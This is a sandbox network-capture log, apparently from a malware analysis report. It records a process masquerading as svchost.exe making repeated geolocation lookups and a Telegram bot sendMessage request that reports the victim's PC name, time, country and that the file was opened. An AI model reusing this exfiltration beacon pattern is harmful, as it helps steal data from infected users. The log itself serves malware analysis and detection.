                                                                                      2024-10-09 10:13:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.849721188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:32 UTC675INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:32 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 28
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NC2OwEz3ABP4UXsS8JUGbiarTZq171jXMPbjM5beFXqy179uoZB6Y5XVdIb1QisYRAyRCTQksdxKmUp%2BLcQx%2BFEutILyUXyb6qnd9NtwYuxe7CzhAv%2B0SYcOAwxkgN1pUWF%2BGhQC"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd993bf892b9c5-EWR
                                                                                      2024-10-09 10:13:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.849723188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:33 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-09 10:13:33 UTC679INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:33 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 29
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DAa%2B%2BmCyTWOFrLGLRMPa6YwXRQR119Sd4R8r2bHthz%2BlSGn6%2FgBVUXhnsHBXr%2BGOEcGBqsIipAPfgQa%2FfthExhiHRw1Ls67zqpymdtOZIutQK79mGvvsRl0B2dzVFZftR3G1x2GU"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99441de58c93-EWR
                                                                                      2024-10-09 10:13:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.849724149.154.167.2204438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:34 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2018:08:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                      Host: api.telegram.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:34 UTC344INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 09 Oct 2024 10:13:34 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 55
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-10-09 10:13:34 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.849727188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:45 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:45 UTC675INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:45 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 41
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAAWRjLxLFnY7qmFP2Mt%2FoOWgFYs1GNpAKf4yepynq1Ec8XqNlgr5JcdXVdDSzTxL%2Fp3YVz%2BBmTlfeo1t2q2dBgjBVc7E%2BBp2nsAAWdEhEKaKG1h53uXYUwlc8FAeuhF1lFc9Io4"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd999158894262-EWR
                                                                                      2024-10-09 10:13:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.849728188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:46 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-09 10:13:46 UTC709INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:46 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 42
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2BAbJCN%2BVD4wfy8zteREESz8KHHKS9sly9F%2Fg%2B9POGimn9dKWAP6kqYs8ZCbcTYk2fNc3kE%2B5NklYSqAayc9PLM0wFIwyQqzeOs3c174UocnDnLfJhkrIxsgJ2qaijW5rN5I1x%2Fj"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99966d9a42bb-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-10-09 10:13:46 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.849730188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:47 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:48 UTC675INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:48 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 44
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yp2GFJTNZhp1YdmPW2oVNr2RtgkLaD0ynMKF%2Bii6IxzLos%2FuJP84uQ3l4dfbqz0vklbMMfi20e7X46lJMq0dZEbG3IMq%2F1shrQQ6r%2FmIoUg9L1CyqAa5NQCAmzj3oaKDwEvaBO6z"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd999f1e5b4251-EWR
                                                                                      2024-10-09 10:13:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.849732188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:49 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:49 UTC679INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:49 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 45
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOyLlfeO%2Bcr04a6FsOIkmiOG1WOpFN4LK7H51ElF6mGx1mCs4ph5NQMqfgh0t7OLWSYC6cjNwc%2B1oAc6shDam3EuSD%2FBff4AM%2BfS7ZEvsUx%2B9fqvZs0IMJFQtfEg5JF%2BysWsTmXI"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99a7edb38c05-EWR
                                                                                      2024-10-09 10:13:49 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.849734188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:50 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:50 UTC675INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:50 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 46
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXLowolmNv4FhB41w2%2Foqm4%2Bx4vYAe0JXhQF46%2FQg7IxPtdobc3Nt3sou1vrRy7VqX3wd7mI09XnEdOB%2Bee9hFDF5mKIfBozvuuX0NwYq6eqserFknw8cA47AJQTew9SFmcli57s"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99b04e248cc5-EWR
                                                                                      2024-10-09 10:13:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.849736188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:51 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:52 UTC681INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:52 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 48
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObYgwC3e%2B2jOpTJVp2hPCYK0tjNO%2BypCMuOotT27Z4cZ%2F3DkGvyYgKEPG%2BNYXBa7gSt8fAcvotV3hew%2BL7DIP8LPGbzULiju%2FUzJwmAQ5wPevPqUGsY%2B8xMYdaRw7NbFqBegfemF"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99b86b5b4357-EWR
                                                                                      2024-10-09 10:13:52 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.849738188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:53 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:53 UTC675INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:53 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 49
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z2Vo%2B1Dz8kqvjGXyCQ8hEFAEghqu%2Fjz7gntlY4rA%2FI5d4Mrmlr4yWozevFmYbFdY7s1CnDuzwLHtQvKIkxDrLdGgbt71a%2Bg7QFOMgE5qwYMSbVpO2lX9LMON0a58dg43fJiNAVC5"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99c0fcbb8c57-EWR
